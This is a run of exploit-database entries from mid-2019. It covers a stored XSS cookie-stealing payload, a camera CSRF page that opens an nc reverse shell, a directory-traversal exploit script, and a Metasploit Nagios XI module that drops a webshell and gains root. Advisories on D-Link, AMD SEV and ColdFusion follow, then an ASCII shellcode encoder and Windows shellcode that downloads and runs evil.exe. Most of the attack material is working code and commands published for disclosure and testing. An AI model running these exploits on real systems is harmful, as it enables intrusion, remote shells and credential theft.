# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection
# Google Dork: inurl:"wp-content/plugins/screets-lcx"
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage: https://screets.com/
# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877
# Version: 2.8.3
# Tested on: Windows 10 / Parrot OS
# CVE : -


Info:

Weak security measures like bad input field data filtering has been
discovered in the «Live Chat Unlimited». Current version of this
premium WordPress plugin is 2.8.3.



PoC:

Go to the demo website https://site.com/try/lcx/night-bird/ and open chat window by clicking on «Open/close» link, then click on «Online mode» to go online. Use your payload inside input field and press [Enter]. 
Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other
website.
Example #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">m0ze
Example #2: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">m0ze

# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA

<html>
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 

Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

Follow the following steps to demonstrate this PoC:

1. Replace IP addresses in Javascript code to repr  esent your testing
   environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
   1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
   * Note: all modern browsers will cache Basic Authentication
     credentials (such as those used by the FCM-MB40) even if the
     FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser. 
   * Note: In an attack scenario, this step would be performed by
     implanting the code into a legitimate webpage that the "admin"
     user visits, or by tricking the "admin" user into opening a page
     which includes the code.
5. Note that the `netcat` listener established in step 2. has received
   a connection from the camera, and that it is presenting a `/bin/sh`
   session as root.
   * Note: type `id` in the `netcat` connection to verify this.

_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
<head>
<script>
const sleep = (milliseconds) => {
    return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';

var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
    var execute_img = document.createElement("img");
    execute_img.src = execute_url;
});
</script>
</head>
<body>
<h1>Welcome to my non-malicious website.</h1>
</body>
</html>

# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717

1. Description
==============

BlogEngine.NET is vulnerable to a directory traversal.  The page parameter, passed to /api/filemanager, reveals the contents of the directory.

2. Proof of Concept
=============

Log in to the application and submit a GET request to /api/filemanager:

Request:

~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~

Depending on how the request is submitted, the response may be XML or JSON

XML Response

~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030

<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
<FileInstance>
<Created>5/14/2019 6:58:46 PM</Created>
<FileSize></FileSize>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../..</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
...
~~

JSON Response

~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011

[
    {
"IsChecked":false,
"SortOrder":0,
"Created":"5/14/2019 7:35:13 PM",
"Name":"...",
"FileSize":"",
"FileType":0,
"FullPath":"~/App_Data/files/../..",
"ImgPlaceholder":""
    }
...
~~

import argparse
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10717

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Outputs list of filenames found in web root

python exploit.py -t $RHOST

?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""

urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
       }

def make_request(session, method, target, data={}):
    proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
              }
    if method == 'GET':
        r = requests.Request(method, target, params=data)
    elif method == 'POST':
        r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text

def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host+urls.get('login'))
    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0],i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host+urls.get('login'), login_data)

def parse(body, path, outfile):
    paths = json.loads(body)
    new_paths = set()
    for i in paths:
        if i.get('FileType') == 0:
            new_paths.add(i.get('FullPath'))
        else:
            outfile.write("{path}\n".format(path=i.get('FullPath')))
    return new_paths

def traverse(session, host, paths, outfile, visited=set()):
    paths = set(paths) - visited
    for path in paths:
        print path
        outfile.write("\n?path={path}\n".format(path=path))
        visited.add(path)
        resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
        new_paths = parse(resp, path, outfile)
        if new_paths:
            traverse(session, host, new_paths, outfile, visited)

def main(host, user, passwd, root, outfile):
    with requests.Session() as s:
        login(s, host, user, passwd)
        traverse(s, host, root, outfile)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
    args = parser.parse_args()

    protocol = "https://" if args.ssl else "http://"
    if isinstance(args.root, str):
        args.root = [args.root]
    main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
'Name'           => "Nagios XI Magpie_debug.php Root Remote Code Execution",
'Description'    => %q{
         This module exploits two vulnerabilities in Nagios XI 5.5.6:
         CVE-2018-15708 which allows for unauthenticated remote code execution
         and CVE 2018–15710 which allows for local privilege escalation.
         When combined, these two vulnerabilities give us a root reverse shell.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Chris Lyne (@lynerc)', # First working exploit
'Guillaume André (@yaumn_)' # Metasploit module
        ],
'References'     =>
        [
          ['CVE', '2018-15708'],
          ['CVE', '2018-15710'],
          ['EDB', '46221'],
          ['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
          ['URL', 'https://www.tenable.com/security/research/tra-2018-37']
        ],
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'Targets'        =>
        [
          ['Nagios XI 5.5.6', version: Gem::Version.new('5.5.6')]
        ],
'DefaultOptions' =>
        {
'RPORT' => 443,
'SSL' => true
        },
'Privileged'     => false,
'DisclosureDate' => "2018-11-14",
'DefaultTarget'  => 0
     ))

    register_options(
      [
        OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
        OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 5])
      ])

    @WRITABLE_PATHS = [
      ['/usr/local/nagvis/share', '/nagvis'],
      ['/var/www/html/nagiosql',  '/nagiosql']
    ]
    @writable_path_index = 0
    @MAGPIERSS_PATH = '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
    @session_opened = false
    @webshell_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    @nse_name = "#{Rex::Text.rand_text_alpha(10)}.nse"
    @meterpreter_name = Rex::Text.rand_text_alpha(10)
  end

  def on_request_uri(cli, req)
    if @current_payload == @webshell_name
      send_response(cli, '<?php system($_GET[\'cmd\'])?>')
    else
      send_response(cli, generate_payload_exe)
    end
  end

  def primer
    res = send_request_cgi(
      {
'method'  => 'GET',
'uri'     => normalize_uri(@MAGPIERSS_PATH),
'vars_get' => {
'url' => "https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} " +
'-o ' + @WRITABLE_PATHS[@writable_path_index][0] + "/#{@current_payload}"
        }
      }, 5)

    if !res || res.code != 200
      print_error('Couldn\'t send malicious request to target.')
    end
 end

  def check_upload
    res = send_request_cgi(
      {
'method' => 'GET',
'uri'    => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
      }, 5)
    if res && res.code == 200
      print_status("#{@current_payload} uploaded with success!")
      return true
    else
      print_error("Couldn't upload #{@current_payload}.")
      return false
    end
  end

  def check
    res = send_request_cgi(
      {
'method'  => 'GET',
'uri'     => normalize_uri(@MAGPIERSS_PATH)
      }, 5)

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    all_files_uploaded = false

    # Upload useful files on the target
    for i in 0..@WRITABLE_PATHS.size
      @writable_path_index = i
      for filename in [@webshell_name, @meterpreter_name]
        @current_payload = filename
        begin
          Timeout.timeout(datastore['HTTPDELAY']) { super }
        rescue Timeout::Error
          if !check_upload
            break
          elsif filename == @meterpreter_name
            all_files_uploaded = true
          end
        end
      end
      if all_files_uploaded
        break
      end
    end

    meterpreter_path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@meterpreter_name}"

    register_file_for_cleanup(
"#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@webshell_name}",
      meterpreter_path,
"/var/tmp/#{@nse_name}"
    )

    # Commands to escalate privileges, some will work and others won't
    # depending on the Nagios version
    cmds = [
"chmod +x #{meterpreter_path} && sudo php /usr/local/nagiosxi/html/includes/" \
"components/autodiscovery/scripts/autodiscover_new.php --addresses=\'127.0.0.1/1`#{meterpreter_path}`\'",
"echo 'os.execute(\"#{meterpreter_path}\")'> /var/tmp/#{@nse_name} " \
"&& sudo nmap --script /var/tmp/#{@nse_name}"
   ]

    # Try to launch root shell
    for cmd in cmds
      res = send_request_cgi(
        {
'uri'     => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
'method'  => 'GET',
'vars_get' => {
'cmd' => cmd
          }
        }, 5)

      if !res && session_created?
        break
      end
      print_status('Couldn\'t get remote root shell, trying another method')
    end
  end
end

The problem in the following models :

DIR-652   
DIR-615   
DIR-827   
DIR-615   
DIR-657   
DIR-825   

If login to  web interface as "User" or "user" , and navigate to url :  

http://<ip>:port/wizard_wan.asp   

in web code page:

view-source:<ip>:port/wizard_wan.asp

scroll down page and bang :

administrator password in plain text

ports : 8080  or  8081  .


---
Ta wiadomość została sprawdzona na obecność wirusów przez oprogramowanie antywirusowe Avast.
https://www.avast.com/antivirus

Overview
========
AMD Secure Encrypted Virtualization (SEV) is a hardware memory encryption
feature. SEV protects guest virtual machines from the hypervisor, provides
confidentiality guarantees at runtime and remote attestation at launch
time. See [1] for details. SEV key management code runs inside the Platform
Security Processor (PSP) [2].

The SEV elliptic-curve (ECC) implementation was found to be vulnerable to
an invalid curve attack. At launch-start command, an attacker can send
small order ECC points not on the official NIST curves, and force the SEV
firmware to multiply a small order point by the firmware’s private DH
scalar.

By collecting enough modular residues, an attacker can recover the complete
PDH private key. With the PDH, an attacker can recover the session key and
the VM’s launch secret. This breaks the confidentiality guarantees offered
by SEV.


Key exchange during VM launch
=========================

1. The PSP publishes its PDH public key through SEV_PDH_CERT_EXPORT
command. This key is computed by multiplying the ECC generator (NIST
P256/P384 curves are supported) by the PDH private key: A<-G*k, where k,
the private key, is randomly generated in the range (1, order(G)).


2. The client generates its private DH key, s, and computes the shared key
C<-A*s=G*k*s. C is the shared point on the curve. Its x-coordinate is
hashed and used as the master shared secret. Two keys KEK/KIK are derived
from the master secret, and used to protect (encryption+integrity) the
session keys.


3. The client computes its public key B<-G*s and sends it to the PSP
through the SEV_LAUNCH_START command.


4. The PSP computes the shared key C by multiplying the client’s public key
by its PDH private scalar: C<-B*k=G*s*k. Like the client, the PSP takes C’s
x coordinate, computes the master shared secret and derives the KEK/KIK.
These are used to unwrap the session keys. See API specification [3] for
details.

ECDH security relies on the generator point, G, having a large order and on
the discrete logarithm problem being hard for the curve.

Note that in step 4, the PSP performs a computation with its private key on
user supplied data - the client’s public point.


Invalid curve attack
===============

ECC point multiplication relies on a point addition primitive. There are
different implementations for ECC point addition. A common one is based on
the short Weierstrass ECC form, as described in [4]. Note that the curve’s
"b" equation parameter is never used.

An invalid curve attack is where the ECDH point multiplication is done on a
different curve - different (a,b) parameters. This becomes possible in the
short Weierstrass point addition function since the "b" parameter is not
used. On this curve, the point has a small prime order. By trying all
possible values for the small order point, an attacker can recover the
private scalar bits (modulo the order). The modular residues are assembled
offline using the Chinese Remainder Theorem, leading to a full key
recovery. See the original paper [5] on invalid curve attacks, or a more
recent paper [6] on the topic.


Affected products
=============

AMD EPYC server platforms (codename "Naples") running SEV firmware version
0.17 build 11 and below are affected.


Fix
===

We were able to verify the fix is properly implemented in build 22 [7]: PSP
rejects points not on the NIST curve, and fails with INVALID_CERT error.


Additional issues
=============

Certificates for PDH keys generated on a vulnerable system are still valid.
This means SEV might still be vulnerable to a migration attack, where a
client’s VM is migrated from a non-vulnerable system to a vulnerable one.

In addition, at this point, it is not clear whether SEV is vulnerable to a
FW downgrade attack.


Credits
======


This vulnerability was discovered and reported to AMD by Cfir Cohen of the
Google Cloud security team.


Timeline
=======

2-19 - Vulnerability disclosed to AMD PSIRT
2-23 - AMD confirms the bug
2-25 - POC shared with AMD
5-13 - AMD requests a 30 day extension
6-04 - AMD releases fixed firmware [7]
6-07 - AMD requests a 2 week extension
6-25 - Public disclosure


[1] - https://developer.amd.com/sev/
[2] - https://en.wikipedia.org/wiki/AMD_Platform_Security_Processor
[3] - https://developer.amd.com/wp-content/resources/55766.PDF
[4] - https://www.hyperelliptic.org/EFD/g1p/auto-shortw.html
[5] - https://www.iacr.org/archive/crypto2000/18800131/18800131.pdf
[6] -
http://www.cs.technion.ac.il/~biham/BT/bt-fixed-coordinate-invalid-curve-attack.pdf
[7] -
https://developer.amd.com/wp-content/resources/amd_sev_fam17h_model0xh_0.17b22.zip

Advisory ID: SYSS-2019-006
Product: Coldfusion/JNBridge
Manufacturer: Adobe/JNBridge LLC
Affected Version(s): Coldfusion 2016,2018, JNBridge all versions
Tested Version(s): 2018
Vulnerability Type: Remote Code Execution
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2019-03-27
Solution Date: 2019-06-11
Public Disclosure: 2019-06-24
CVE Reference: CVE-2019-7839
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

JNBridge is a technology for integrating Java and .NET application code.

The manufacturer describes the product as follows (see [1]):

"Access Java classes from .NET as if Java were a .NET language
(C#, VB, etc). Access .NET classes (written in C#, VB, F#, etc.)
from Java as if they were Java classes. Access objects and libraries
across the platform boundary."

"Create objects, call methods, access fields, return objects."

As stated, this technology, more or less by design, allows unrestricted
access to a remote Java Runtime Environment, thereby allowing the execution
of arbitrary code and system commands.

Adobe Coldfusion is a web application development platform.

Coldfusion servers running on Windows publicly expose an JNBridge
network listener on TCP port 6093 or 6095.

An attacker that is able to reach that service can execute arbitrary
Java code or system commands. By default this services is running with
highest privileges (SYSTEM).


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Analysis of the JNBridge protocol reveals that it directly exposes
basic operations like:
* creating Java objects using arbitrary constructors
* calling methods on these objects
* getting/setting fields of these objects
* calling static methods

Combined, these primitives essentially expose all of the Java runtime
environment's available code/methods. For example the sequence

1. objectStaticCall java.lang.Runtime:getRuntime
   -> handle to java.lang.Runtime instance
2. objectVirtualCall handle->exec("command")
   -> handle to Process

can be used to invoke arbitrary system commands.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The necessary parts of the protocol to invoke the Runtime.exec() method
like described above were implemented. That code remains unreleased at
this time.

The PoC also reads and shows the command output. Running it against
a default installation of Coldfusion 2018 on Windows 10:

$ ./jnbridge.py -p 6095 192.168.56.101 'whoami'
nt authority\system

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Apply the latest ColdFusion security patches, see [5].

Do not expose JNBridge listeners to untrusted parties.
In general, the JNBridge technology/protocol must not be used across
privilege boundaries. It appears unlikely that this technology can be
made reasonably secure, even with major changes to the protocol.

Securing a JNBridge listener seems non-trivial, there does not seem
to be built-in support for authentication and
"JNBridgePro supports secure cross-platform communications using SSL
(secure sockets library). SSL provides message encryption, server
authentication, and message integrity. Currently, client authentication
is not supported."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-03-18: Vulnerability discovered
2019-03-27: Vulnerability reported to manufacturer
2019-06-11: Patch released by manufacturer
2019-06-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for JNBridge
    https://jnbridge.com/
[2] Product website for Adobe Coldfusion
    https://www.adobe.com/products/coldfusion-family.html
[3] SySS Security Advisory SYSS-2019-006

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-006.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[5] Adobe Security Bulletin APSB19-27
    https://helpx.adobe.com/security/products/coldfusion/apsb19-27.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E  CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

#!/usr/bin/env python3

################################################################################
# INTRODUCTION
################################################################################

# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD
# Date: 26.6.2019
# Encoder Author: Petr Javorik, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
#
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
#
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Then we can do it as follows:
#
# AND EAX, 3F465456
# AND EAX, 40392B29         ; Two AND instructions zero EAX
# SUB EAX, 3E716230         ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523         ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722         ; we get EAX = 0x8BD1EB05
# PUSH EAX

# Mandatory bytes:
# \x25  AND EAX, imm32
# \x2d  SUB EAX, imm32
# \x50  PUSH EAX
# \x61  POPAD

# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder

# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.

################################################################################

import itertools
import struct
import random
import sys

assert sys.version_info >= (3, 6)


################################################################################
# CONSTANTS - no changes needed here
################################################################################

# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b))   # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b))   # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a))  # 0123456789
SPECIAL_CHARS = bytearray(
    itertools.chain(
        range(0x21, 0x30),  # !"#$%&\'()*+,-.
        range(0x3a, 0x41),  # :;<=>?
        range(0x5b, 0x61),  # [\\]^_
        range(0x7b, 0x7f)   # {|}
    )
)
ASCII_NOPS = b'\x41\x42\x43\x44'     # and many more
ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)

################################################################################
# SETTINGS - enter shellcode, select character set and bad chars
################################################################################

input_shellcode = (
    b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
    b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
    b'\x75\xe7\xff\xe7'
)

# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS

# badchars = b''
badchars = b''

nops = ASCII_NOPS

################################################################################
# CORE - no changes needed here
################################################################################

class ASCII_Encoder(object):

    def __init__(self, shellcode_, charset_, badchars_, nops_):

        # Constructor args
        self.shellcode = bytearray(shellcode_)
        self.charset = charset_
        self.badchars = badchars_
        self.nops = nops_

        # Private vars
        self.encoded_dwords = []
        self.twos_comps = []
        self.sub_operands = []
        self.payload = bytearray()

    def encode(self):

        self.align_to_dwords()
        self.remove_badchars()
        self.derive_dwords_sub()
        self.compensate_overflow()
        self.derived_dwords_to_sub_operands()
        self.twos_comp_check()
        self.compile_payload()


    def align_to_dwords(self):

        # Input shellcode alignment to dword multiples
        nop = b'\x90'
        pad_count = 4 - (len(self.shellcode) % 4)
        if 0 < pad_count < 4:
            self.shellcode += nop * pad_count

    def remove_badchars(self):

        for badchar in self.badchars:
            self.charset = self.charset.replace(bytes([badchar]), b'')
            self.nops = self.nops.replace(bytes([badchar]), b'')

    def derive_dwords_sub(self):

        def get_sub_encoding_bytes(target):
"""
            target      x   y       z
            0x100 - (0x21+0x21) = 0xbe

            We need to select x, y, z such that it gives target when summed and all of
            x, y, z is ASCII and non-badchar
"""

            # Get all possible solutions
            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
            results = []
            for x, y in all_xy:
                z = target - (x + y)
                # Get only bytes which are ASCII and non-badchar
                if (0 < z < 256) and (z in self.charset):
                    results.append({
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
                    })

            # Choose random solution
            return random.choice(results)

        for dword in struct.iter_unpack('<L', self.shellcode):

            # 32-bit 2's complement
            twos_comp = (dword[0] ^ 0xffffffff) + 1
            self.twos_comps.append(twos_comp)

            encoded_block = []
            for byte_ in struct.pack('>L', twos_comp):

                # Will overflow be used when calculating this byte using 3 SUB instructions?
                if byte_ / 3 < min(self.charset):
                    byte_ += 0x100
                encoded_block.append(
                    get_sub_encoding_bytes(byte_))
                pass

            self.encoded_dwords.append(encoded_block)

    def compensate_overflow(self):

        # If neighbor lower byte overflow then subtract 1 from max(x, y, z)
        for dword in self.encoded_dwords:
            for solution, next_solution in zip(dword, dword[1:]):
                if next_solution['of']:
                    max_value_key = max(solution, key=solution.get)
                    solution[max_value_key] -= 1

    def derived_dwords_to_sub_operands(self):

        for dword in self.encoded_dwords:

            sub_operand_0 = struct.pack('<BBBB',
                                        *[solution['x'] for solution in dword])
            sub_operand_1 = struct.pack('<BBBB',
                                        *[solution['y'] for solution in dword])
            sub_operand_2 = struct.pack('<BBBB',
                                        *[solution['z'] for solution in dword])

            self.sub_operands.append([
                sub_operand_0,
                sub_operand_1,
                sub_operand_2
            ])

    def twos_comp_check(self):

        # Check if calculated dwords for SUB instruction give 2's complement if they are summed
        for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
            sup_operand_sum = sum(
                [int.from_bytes(dw, byteorder='big') for dw in sub_operand])

            # Correction of sum if there is overflow on the highest byte
            if sup_operand_sum > 0xffffffff:
                sup_operand_sum -= 0x100000000
            assert (twos_comp == sup_operand_sum)

    def compile_payload(self):

        def derive_bytes_and():

            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
            results = []
            for x, y in all_xy:
                if x + y == 127:
                    results.append((x, y))
            while 1:
                yield random.choice(results)

        def derive_dwords_and():

            gen_bytes = derive_bytes_and()
            bytes_ = []
            for _ in range(0, 4):
                bytes_.append(next(gen_bytes))

            return bytes_

        # POPAD n times to adjust ESP.
        # Decoded shellcode must be written after the decoder stub
        self.payload += b'\x61' * (len(self.encoded_dwords))

        for sub_operand in reversed(self.sub_operands):

            # Clearing EAX instructions with AND instructions
            bytes_ = derive_dwords_and()

            self.payload += b'\x25' + struct.pack('<BBBB',
                                             *[byte_[0] for byte_ in bytes_])
            self.payload += b'\x25' + struct.pack('<BBBB',
                                             *[byte_[1] for byte_ in bytes_])

            # Encoded shellcode with SUB instructions
            self.payload += b'\x2d' + sub_operand[0][::-1]
            self.payload += b'\x2d' + sub_operand[1][::-1]
            self.payload += b'\x2d' + sub_operand[2][::-1]

            # Push EAX
            self.payload += b'\x50'

        # Pad with NOPs
        self.payload += bytes(random.choices(self.nops, k=9))

    def print_payload(self):

        print('Original payload length: {}'.format(len(input_shellcode)))
        print('Encoded payload length: {}'.format(len(self.payload)))
        print('hex:  ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))


if __name__ == '__main__':

    encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
    encoder.encode()
    encoder.print_payload()

/*
; Shellcode Title : bitsadmin download and execute
; Shellcode Author : Joseph McDonagh
; Date June 26, 2019
; Shellcode Length 210
; However, if the application you are exploiting already loads it, then all you need ...
; ... is the System Call and ExitProcess in kernel32.dll
; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
; ... relatively slow bitsadmin.exe program
; Tested on Windows XP SP2
; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
; after reading iamroot blog
; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe"&& ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
;
; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe"&& ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe


xor eax, eax             ;Get the msvcrt.dll
mov ax, 0x7472           ;"tr\0\0"
push eax
push dword 0x6376736d    ;"cvsm"
push esp

; LoadLibrary
mov ebx, 0x7c801d77      ;Address of function LoadLibraryA (winxp)
call ebx
mov ebp, eax             ;msvcrt.dll is saved in ebp

xor eax, eax
push eax

push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x5c3a6320 ; \:c 
push 0x632f2065 ; c/ e
push 0x78652e64 ; xe.d
push 0x6d632026 ; mc &
push 0x2620312e ; & 1.
push 0x302e302e ; 0.0.
push 0x37323120 ; 721 
push 0x3033206e ; 03 n
push 0x2d20676e ; - gn
push 0x69702026 ; ip &
